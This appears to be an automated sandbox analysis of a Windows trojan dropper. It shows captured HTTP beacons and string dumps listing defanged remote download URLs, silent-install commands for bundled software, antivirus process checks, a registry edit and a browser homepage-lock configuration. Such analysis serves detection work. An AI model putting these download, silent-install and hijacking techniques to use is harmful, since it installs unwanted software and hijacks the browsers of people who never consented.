..a..B...].`.r.G4.I'K].t\...."...........).5"N......<2X..3..r$hoR7.
?.UtG.B....!u.b<}GF.d.H..V.D.:[email protected]...:jx..el......m....Mp.].s<<< skipped >>>

GET /large/6da25678gw1f1la7wjwlnj20c80gbnpj.jpg HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: ww1.sinaimg.cn


HTTP/1.1 200 OK

Date: Mon, 11 Apr 2016 17:52:23 GMT

Server: PWS/8.1.36

X-Px: ms h0-s1005.v0-voz ( h0-s1001.v0-voz), ms h0-s1001.v0-voz ( h0-s1345.p0-kix), ht-d h0-s1345.p0-kix.cdngp.net

Cache-Control: max-age=7776000

Expires: Thu, 02 Jun 2016 16:11:40 GMT

Age: 3289243

Accept-Ranges: bytes

Content-Length: 8045184

Content-Type: image/jpeg

Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT

X-Via-CDN: f=TXCDN,s=83.169.205.8,c=37.57.16.189

Connection: keep-alive
......JFIF.............C..............................................
......................C...............................................
........................K...."........................................
.L.........................!1.AQ.."aq..2...B...#...3Rbr..$C....%....S&
45c....................................;.......................!..1.."
AQa2q........#B...3.R.$Kr............?.... ...k....Y _o.#P.@@....$..
!..SP...@...(..d9"J.T..nQ..[%.F. Y.|. .8@y%.!.G......l....M.$.(..0...C
.$.....\.... .[..$J....E.]/[email protected]...$ y.d.HjSX.d.).P...>in.@.&. <
;....hE.-..... ..!..........$o......B ........HB...........[D.@BI$...}
...T.]-..R%"...t.Q.P.M.%"uA..\.v.].......K.).&...4.{.4.........t@!J. 7
N..D".4~.s.h.n.I..E.H$7G.k...l.E4A.W..%k&6!jQ..B.4p.A... .!..Gd..j.WB.
&....4JjWM../$..).;[email protected].@..#..=...."....M...\.B...
..I±.Dv......A..D...!......(.W@......$...}.v)..A...Z.][email protected]..:..
@.. ..<...M..)n..;f..rJ.(...4A..$R...".$.\..`.d.G`...BH..V....D%. .
4.#R.J.....J....[%t6D..nR(..4...H.i....I5.WF.sI!..n.@$ .H [email protected]?$..
..7.h... ..=RHC..H..!...b..J.....)...k..d.$...&.O.....!t......\uK...B.
....j.lxJ[..I5.[z..I....M.Cdo.D...I"......%1.......i..hV. ...4@)$u.I$.
%..I]6..{.wI .!..n.) ..i.Q.[&...!.N. BB.A X#.  ..[......RCr...6..d....
.D.CC....4D.........Cd.H$...&.$..4.@..\. .(. .{.....W@.%pSG$.n.47..w@p
..^.%.... [email protected].].B..d...J.A-.$..mR..._
..a..B...].`.r.G4.I'K].t\...."...........).5"N......<2X..3..r$hoR7.
?.UtG.B....!u.b<}GF.d.H..V.D.:[email protected]...:jx..el......m....Mp.].s<<< skipped >>>

POST /kuaizipreport/online?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCUU0MjgzMjE4NzU1QkMzN0U1Q0E4ODg3NUY5MUJFMzczCSgwPVhQMywxPWFkbSwyPTE0NjAzOTcyNzMsMTQ2MDM5NzI5NiwxNDYwMzk3MzAwKQ== HTTP/1.1

Host: tj.kpzip.com

Accept: */*

Content-Length: 0


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Transfer-Encoding: chunked

Date: Mon, 11 Apr 2016 17:52:17 GMT
c..{"status":1}..0..

GET /stat/index.php?pcid=630eda2537585b8645a6e7879b8a0d8b&app=kuaizip&ver=2.8.14.2&channel=union123_0088&category=KuaiZip.exe&act=app_open&p1=&p2=&key=2f5e2aa5d66794c2de4340db01f67516 HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1

Host: stat.kpzip.com

Cache-Control: no-cache


HTTP/1.1 400 Bad Request

Server: nginx/1.4.1

Date: Mon, 11 Apr 2016 17:53:11 GMT

Content-Type: text/html

Content-Length: 172

Connection: close
<html>..<head><title>400 Bad Request</title>&l
t;/head>..<body bgcolor="white">..<center><h1>400
 Bad Request</h1></center>..<hr><center>nginx/
1.4.1</center>..</body>..</html>....

POST /kuaizipreport/install?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTEJMAlFNDI4MzIxODc1NUJDMzdFNUNBODg4NzVGOTFCRTM3MwkxCUt1YWlaaXBfU2V0dXBfdW5pb24xMjNfMDA4OC5leGUJL0ppbmdNbw== HTTP/1.1

Host: tj.kpzip.com

Accept: */*

Content-Length: 0


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Transfer-Encoding: chunked

Date: Mon, 11 Apr 2016 17:52:17 GMT
c..{"status":1}..0..

GET /large/6da25678gw1f1l5qvobehj20c80gbnpk.jpg HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: ww4.sinaimg.cn


HTTP/1.1 200 OK

Date: Mon, 11 Apr 2016 17:52:24 GMT

Server: PWS/8.1.36

X-Px: ms h0-s1150.p11-fra ( h0-s1158.p11-fra), ht-d h0-s1158.p11-fra.cdngp.net

Cache-Control: max-age=7776000

Expires: Sun, 05 Jun 2016 17:55:35 GMT

Age: 3023809

Accept-Ranges: bytes

Content-Length: 9059732

Content-Type: image/jpeg

Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT

X-Via-CDN: f=TXCDN,s=151.249.89.195,c=37.57.16.189

Connection: keep-alive
......JFIF.............C..............................................
......................C...............................................
........................K...."........................................
.L.........................!1.AQ.."aq..2...B...#...3Rbr..$C....%....S&
45c....................................;.......................!..1.."
AQa2q........#B...3.R.$Kr............?.... ...k....Y _o.#P.@@....$..
!..SP...@...(..d9"J.T..nQ..[%.F. Y.|. .8@y%.!.G......l....M.$.(..0...C
.$.....\.... .[..$J....E.]/[email protected]...$ y.d.HjSX.d.).P...>in.@.&. <
;....hE.-..... ..!..........$o......B ........HB...........[D.@BI$...}
...T.]-..R%"...t.Q.P.M.%"uA..\.v.].......K.).&...4.{.4.........t@!J. 7
N..D".4~.s.h.n.I..E.H$7G.k...l.E4A.W..%k&6!jQ..B.4p.A... .!..Gd..j.WB.
&....4JjWM../$..).;[email protected].@..#..=...."....M...\.B...
..I±.Dv......A..D...!......(.W@......$...}.v)..A...Z.][email protected]..:..
@.. ..<...M..)n..;f..rJ.(...4A..$R...".$.\..`.d.G`...BH..V....D%. .
4.#R.J.....J....[%t6D..nR(..4...H.i....I5.WF.sI!..n.@$ .H [email protected]?$..
..7.h... ..=RHC..H..!...b..J.....)...k..d.$...&.O.....!t......\uK...B.
....j.lxJ[..I5.[z..I....M.Cdo.D...I"......%1.......i..hV. ...4@)$u.I$.
%..I]6..{.wI .!..n.) ..i.Q.[&...!.N. BB.A X#.  ..[......RCr...6..d....
.D.CC....4D.........Cd.H$...&.$..4.@..\. .(. .{.....W@.%pSG$.n.47..w@p
..^.%.... [email protected].].B..d...J.A-.$..mR..._
..a..B...].`.r.G4.I'K].t\...."...........).5"N......<2X..3..r$hoR7.
?.UtG.B....!u.b<}GF.d.H..V.D.:[email protected]...:jx..el......m....Mp.].s<<< skipped >>>

POST /kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTIzNDVoYW96aXAtMDAwfDM2MHppcC0wMDB8N3otMDAwfFdpblJBUi0wMDB8MzYwQVFXUy0wMDA= HTTP/1.1

Host: tj.kpzip.com

Accept: */*

Content-Length: 0


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Transfer-Encoding: chunked

Date: Mon, 11 Apr 2016 17:52:22 GMT
c..{"status":1}..0..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_756:

`.rsrc

t$(SSh

~%UVW

.tTPV

FTPjK

FtPj;

F.PjRWj

u.WWj

u.VVj

u$SShe

ole32.dll

urlmon

user32.dll

shell32.dll

RegOpenKeyA

RegEnumKeyA

MsgWaitForMultipleObjects

URLDownloadToFileA

D:\dream

D:\dream\winky.log

D:\dream\win1.log

360tray.exe

D:\dream\winbj.log

QQPCTray.exe

kxetray.exe

C:\Users\Public\Desktop\2345

%Documents and Settings%\All Users\

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Microsoft\Windows\CurrentVersion\Uninstall\

Windows

C:\Users\Public\Desktop\UC

C:\Users\Public\Desktop\

D:\dream\winzy.log

hXXp://down.ads9158.com:9000/go6.asp?userid=35658

hXXp://z4.cnzz.com/stat.htm?id=1254275646

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Content-Type: application/x-www-form-urlencoded

hXXp://z11.cnzz.com/stat.htm?id=1254275435

D:\dream\ky

hXXp://t.cn/RGHZNbv

D:\dream\Kuaizip_Setup_union123_0088.exe

D:\dream\KuaiZip_Setup_union123_0088.exe /JingMo

D:\dream\KuaiZip_Setup_union123_0088.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall

D:\dream\ky.bat

hXXp://z13.cnzz.com/stat.htm?id=1256550373

D:\dream\b2.bat

D:\dream\2k1

hXXp://t.cn/RGHZM4u

D:\dream\2k2

hXXp://t.cn/RGHZx7C

D:\dream\k1

D:\dream\k2

D:\dream\2345pic_k1252705.exe

D:\dream\2345pic_k1252705.exe -s1

2345pic_k1252705.exe

C:\Users\

%Documents and Settings%\

D:\dream\1.bat

hXXp://z4.cnzz.com/stat.htm?id=1254275459

D:\dream\dd2b1

hXXp://t.cn/RGHZ6Au

D:\dream\dd2b2

hXXp://t.cn/RGHZ6YL

D:\dream\dd2b3

hXXp://t.cn/RGHZXw9

D:\dream\dd2b4

hXXp://t.cn/RGHZXXJ

D:\dream\dd2b5

hXXp://t.cn/RGHZXms

D:\dream\dd2b6

hXXp://t.cn/RGHZaUC

D:\dream\dd2b7

hXXp://t.cn/RGHZaOe

D:\dream\2b1

D:\dream\2b2

D:\dream\2b3

D:\dream\2b4

D:\dream\2b5

D:\dream\2b6

D:\dream\2b7

D:\dream\2345explorer_k1252705.exe

D:\dream\2345explorer_k1252705.exe -s1

2345explorer_k1252705.exe

D:\dream\d2b.bat

hXXp://z13.cnzz.com/stat.htm?id=1256619493

D:\dream\uc1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc1?public&code=8c8c3cd80ce9a0c57c016bb58fbe1fe5

D:\dream\uc2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc2?public&code=88e179c33b3a9af4521dd59e1bd78eb9

D:\dream\uc3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc3?public&code=9938d6a66783aa39f17544f8dec6cf72

D:\dream\uc4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc4?public&code=152db8e9d36a28926ca9eb531995d289

D:\dream\uc5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc5?public&code=427d9e5007c4afb93302343de4f0ac69

D:\dream\uc6

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc6?public&code=428fcf54b656f33b1a89098eda969ff3

D:\dream\lgeuc

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lge/lge?public&code=411f778b2af125c63e48c0bafb370ced

D:\dream\BlueInstaller_bsvalkkx_101101_.exe

D:\dream\BlueResource.bpk

set "w71=Microsoft\Windows\Start Menu\Programs"

set "w72=Microsoft\Windows\Start Menu"

"%USERPROFILE%\%xp1%"

"%ALLUSERSPROFILE%\%xp1%"

"%USERPROFILE%\%xp2%"

"%ALLUSERSPROFILE%\%xp2%"

reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f

D:\dream\uc.bat

<BrowserItem Process="iexplore.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=96468612_hao_pg" IsLock="TRUE" />

<BrowserItem Process="chrome.exe" Title="hao123

<BrowserItem Process="safari.exe" Title="hao123

<BrowserItem Process="TheWorld.exe.exe" Title="hao123

<BrowserItem Process="sogouexplorer.exe" Title="hao123

<BrowserItem Process="qqbrowser.exe" Title="hao123

<BrowserItem Process="baidubrowser.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=97215765_hao_pg" IsLock="TRUE" />

<BrowserItem Process="2345explorer.exe" Title="360

" URL="hXXp://hao.360.cn/?src=lm&ls=n6f9da49b8f" IsLock="TRUE" />

<BrowserItem Process="maxthon.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=96074770_hao_pg" IsLock="TRUE" />

<BrowserItem Process="ucbrowser.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=96982550_hao_pg" IsLock="TRUE" />

<BrowserItem Process="firefox.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=95621234_hao_pg" IsLock="TRUE" />

<BrowserItem Process="hao123Juzi.exe" Title="hao123

<BrowserItem Process="Juzi.exe" Title="hao123

<BrowserItem Process="hao123browser.exe" Title="hao123

<BrowserItem Process="liebao.exe" Title="hao123

<BrowserItem Process="360se.exe" Title="360

<BrowserItem Process="360chrome.exe" Title="360

C:\ProgramData\HomeSafe\start_config.xml

%Documents and Settings%\All Users\Application Data\HomeSafe\start_config.xml

hXXp://z11.cnzz.com/stat.htm?id=1254275466

D:\dream\js1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js1?public&code=b1ee60115a4f70d315a979e9b6845c55

D:\dream\js2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js2?public&code=d6b869e3aa48ef860876b5403764d3d8

D:\dream\js3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js3?public&code=20b0530111249bd0649013a5f42afc61

D:\dream\duba_u20862342_sv1_3_18.exe

hXXp://z13.cnzz.com/stat.htm?id=1256627376

D:\dream\bjzy

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240

D:\dream\LockPage.exe

hXXp://z11.cnzz.com/stat.htm?id=1256550363

::0:0@>@>:0:0:

xjj%uI

:0@>@>:0:0:

4qP.rk%

B&.Ct

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

1.2.18

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

MSWHEEL_ROLLMSG

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

iphlpapi.dll

SHLWAPI.dll

MPR.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

(*.avi)|*.avi

WPFT532.CNV

WPFT632.CNV

EXCEL32.CNV

write32.wpc

Windows Write

mswrd632.wpc

Word for Windows 6.0

wword5.cnv

Word for Windows 5.0

mswrd832.cnv

mswrd632.cnv

Word 6.0/95 for Windows & Macintosh

html32.cnv

VVV.dywt.com.cn

Service Pack %d

Windows 2003

Windows XP

Windows 2000

Windows NT

Windows ??

Windows Millenium Edition

Windows 98 Second Edition

Windows 98 SP1

Windows 98

Windows 95 OSR2

Windows 95 SP1

Windows 95

Windows CE

Microsoft Windows Me

Microsoft Windows 98

Microsoft Windows 95

Windows Server 2008 R2

Windows 7

Windows Server 2008

Windows Vista

Microsoft Windows 2003

Microsoft Windows XP

Microsoft Windows 2000

Microsoft Windows NT

KERNEL32.DLL

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

GetWindowsDirectoryA

WinExec

GetProcessHeap

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

ShellExecuteA

GetKeyboardLayout

GetKeyState

SetWindowsHookExA

UnhookWindowsHookEx

CreateDialogIndirectParamA

.text

`.rdata

@.data

.rsrc

g[Key

@/2222$.

^/22/2222

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD

ADVAPI32.dll

AVIFIL32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

MSVFW32.dll

OLEAUT32.dll

RASAPI32.dll

SHELL32.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

(*.*)

7.6.3.2

%original file name%.exe_756_rwx_00401000_00140000:

t$(SSh

~%UVW

.tTPV

FTPjK

FtPj;

F.PjRWj

u.WWj

u.VVj

u$SShe

ole32.dll

urlmon

user32.dll

shell32.dll

RegOpenKeyA

RegEnumKeyA

MsgWaitForMultipleObjects

URLDownloadToFileA

D:\dream

D:\dream\winky.log

D:\dream\win1.log

360tray.exe

D:\dream\winbj.log

QQPCTray.exe

kxetray.exe

C:\Users\Public\Desktop\2345

%Documents and Settings%\All Users\

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Microsoft\Windows\CurrentVersion\Uninstall\

Windows

C:\Users\Public\Desktop\UC

C:\Users\Public\Desktop\

D:\dream\winzy.log

hXXp://down.ads9158.com:9000/go6.asp?userid=35658

hXXp://z4.cnzz.com/stat.htm?id=1254275646

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Content-Type: application/x-www-form-urlencoded

hXXp://z11.cnzz.com/stat.htm?id=1254275435

D:\dream\ky

hXXp://t.cn/RGHZNbv

D:\dream\Kuaizip_Setup_union123_0088.exe

D:\dream\KuaiZip_Setup_union123_0088.exe /JingMo

D:\dream\KuaiZip_Setup_union123_0088.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall

D:\dream\ky.bat

hXXp://z13.cnzz.com/stat.htm?id=1256550373

D:\dream\b2.bat

D:\dream\2k1

hXXp://t.cn/RGHZM4u

D:\dream\2k2

hXXp://t.cn/RGHZx7C

D:\dream\k1

D:\dream\k2

D:\dream\2345pic_k1252705.exe

D:\dream\2345pic_k1252705.exe -s1

2345pic_k1252705.exe

C:\Users\

%Documents and Settings%\

D:\dream\1.bat

hXXp://z4.cnzz.com/stat.htm?id=1254275459

D:\dream\dd2b1

hXXp://t.cn/RGHZ6Au

D:\dream\dd2b2

hXXp://t.cn/RGHZ6YL

D:\dream\dd2b3

hXXp://t.cn/RGHZXw9

D:\dream\dd2b4

hXXp://t.cn/RGHZXXJ

D:\dream\dd2b5

hXXp://t.cn/RGHZXms

D:\dream\dd2b6

hXXp://t.cn/RGHZaUC

D:\dream\dd2b7

hXXp://t.cn/RGHZaOe

D:\dream\2b1

D:\dream\2b2

D:\dream\2b3

D:\dream\2b4

D:\dream\2b5

D:\dream\2b6

D:\dream\2b7

D:\dream\2345explorer_k1252705.exe

D:\dream\2345explorer_k1252705.exe -s1

2345explorer_k1252705.exe

D:\dream\d2b.bat

hXXp://z13.cnzz.com/stat.htm?id=1256619493

D:\dream\uc1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc1?public&code=8c8c3cd80ce9a0c57c016bb58fbe1fe5

D:\dream\uc2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc2?public&code=88e179c33b3a9af4521dd59e1bd78eb9

D:\dream\uc3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc3?public&code=9938d6a66783aa39f17544f8dec6cf72

D:\dream\uc4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc4?public&code=152db8e9d36a28926ca9eb531995d289

D:\dream\uc5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc5?public&code=427d9e5007c4afb93302343de4f0ac69

D:\dream\uc6

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc6?public&code=428fcf54b656f33b1a89098eda969ff3

D:\dream\lgeuc

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lge/lge?public&code=411f778b2af125c63e48c0bafb370ced

D:\dream\BlueInstaller_bsvalkkx_101101_.exe

D:\dream\BlueResource.bpk

set "w71=Microsoft\Windows\Start Menu\Programs"

set "w72=Microsoft\Windows\Start Menu"

"%USERPROFILE%\%xp1%"

"%ALLUSERSPROFILE%\%xp1%"

"%USERPROFILE%\%xp2%"

"%ALLUSERSPROFILE%\%xp2%"

reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f

D:\dream\uc.bat

<BrowserItem Process="iexplore.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=96468612_hao_pg" IsLock="TRUE" />

<BrowserItem Process="chrome.exe" Title="hao123

<BrowserItem Process="safari.exe" Title="hao123

<BrowserItem Process="TheWorld.exe.exe" Title="hao123

<BrowserItem Process="sogouexplorer.exe" Title="hao123

<BrowserItem Process="qqbrowser.exe" Title="hao123

<BrowserItem Process="baidubrowser.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=97215765_hao_pg" IsLock="TRUE" />

<BrowserItem Process="2345explorer.exe" Title="360

" URL="hXXp://hao.360.cn/?src=lm&ls=n6f9da49b8f" IsLock="TRUE" />

<BrowserItem Process="maxthon.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=96074770_hao_pg" IsLock="TRUE" />

<BrowserItem Process="ucbrowser.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=96982550_hao_pg" IsLock="TRUE" />

<BrowserItem Process="firefox.exe" Title="hao123

" URL="hXXp://VVV.hao123.com/?tn=95621234_hao_pg" IsLock="TRUE" />

<BrowserItem Process="hao123Juzi.exe" Title="hao123

<BrowserItem Process="Juzi.exe" Title="hao123

<BrowserItem Process="hao123browser.exe" Title="hao123

<BrowserItem Process="liebao.exe" Title="hao123

<BrowserItem Process="360se.exe" Title="360

<BrowserItem Process="360chrome.exe" Title="360

C:\ProgramData\HomeSafe\start_config.xml

%Documents and Settings%\All Users\Application Data\HomeSafe\start_config.xml

hXXp://z11.cnzz.com/stat.htm?id=1254275466

D:\dream\js1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js1?public&code=b1ee60115a4f70d315a979e9b6845c55

D:\dream\js2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js2?public&code=d6b869e3aa48ef860876b5403764d3d8

D:\dream\js3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js3?public&code=20b0530111249bd0649013a5f42afc61

D:\dream\duba_u20862342_sv1_3_18.exe

hXXp://z13.cnzz.com/stat.htm?id=1256627376

D:\dream\bjzy

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240

D:\dream\LockPage.exe

hXXp://z11.cnzz.com/stat.htm?id=1256550363

::0:0@>@>:0:0:

xjj%uI

:0@>@>:0:0:

4qP.rk%

B&.Ct

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

1.2.18

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

MSWHEEL_ROLLMSG

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

iphlpapi.dll

SHLWAPI.dll

MPR.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

(*.avi)|*.avi

WPFT532.CNV

WPFT632.CNV

EXCEL32.CNV

write32.wpc

Windows Write

